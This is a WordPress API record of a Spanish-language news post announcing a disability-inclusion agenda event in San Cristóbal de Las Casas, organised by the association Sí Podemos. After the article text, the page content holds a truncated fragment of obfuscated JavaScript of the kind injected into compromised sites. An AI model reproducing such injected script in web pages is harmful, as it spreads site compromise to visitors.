{"id":16928,"date":"2024-08-01T01:39:36","date_gmt":"2024-08-01T01:39:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16928"},"modified":"2024-08-01T01:39:37","modified_gmt":"2024-08-01T01:39:37","slug":"invitan-a-la-agenda-de-inclusion-para-personas-con-discapacidad","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16928","title":{"rendered":"Invitan a la Agenda de Inclusi\u00f3n para Personas con Discapacidad"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"613\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240731-WA0013.jpg\" alt=\"\" class=\"wp-image-16929\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240731-WA0013.jpg 920w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240731-WA0013-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240731-WA0013-768x512.jpg 768w\" sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>31 de julio del 2024. Tuxtla Guti\u00e9rrez.-San Crist\u00f3bal de Las Casas.- La Asociaci\u00f3n Civil S\u00ed Podemos ha extendido una invitaci\u00f3n a la comunidad para participar en la Agenda de la Inclusi\u00f3n en las Personas con Discapacidad 2024-2027, un evento que se llevar\u00e1 a cabo el pr\u00f3ximo s\u00e1bado 3 de agosto a las 16 horas en el Museo de San Crist\u00f3bal (Musac), ubicado en el Centro Hist\u00f3rico de esta ciudad.<\/p>\n\n\n\n<p>La invitaci\u00f3n especifica que el evento est\u00e1 dirigido a Asociaciones Civiles, Organizaciones y al p\u00fablico en general, y tiene como objetivo discutir y establecer pol\u00edticas y acciones que promuevan la inclusi\u00f3n de las personas con discapacidad en todos los \u00e1mbitos de la sociedad.<\/p>\n\n\n\n<p>Como invitada especial, se contar\u00e1 con la presencia de la Diputada local electa por cuota de discapacidad, Luz Mar\u00eda Castillo Moreno, quien compartir\u00e1 su visi\u00f3n y propuestas para impulsar la inclusi\u00f3n desde el \u00e1mbito legislativo.<\/p>\n\n\n\n<p>\u201cEste encuentro promete ser un espacio clave para fortalecer las redes de apoyo y colaboraci\u00f3n entre diversas organizaciones y la sociedad civil, en pro de un Chiapas m\u00e1s inclusivo y accesible para todos. Para m\u00e1s informaci\u00f3n, se puede contactar a la Asociaci\u00f3n Civil S\u00ed Podemos a trav\u00e9s de sus redes sociales\u201d, concluyen.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 31 de julio del 2024. Tuxtla Guti\u00e9rrez.-San Crist\u00f3bal de Las Casas.- La Asociaci\u00f3n Civil S\u00ed Podemos ha extendido una invitaci\u00f3n a la comunidad para participar en la Agenda de la Inclusi\u00f3n en las Personas con Discapacidad 2024-2027, un evento que se llevar\u00e1 a cabo el pr\u00f3ximo s\u00e1bado 3 de agosto a las &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16929,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-16928","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16928","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16928"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16928\/revisions"}],"predecessor-version":[{"id":16930,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16928\/revisions\/16930"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16929"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16928"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16928"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16928"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}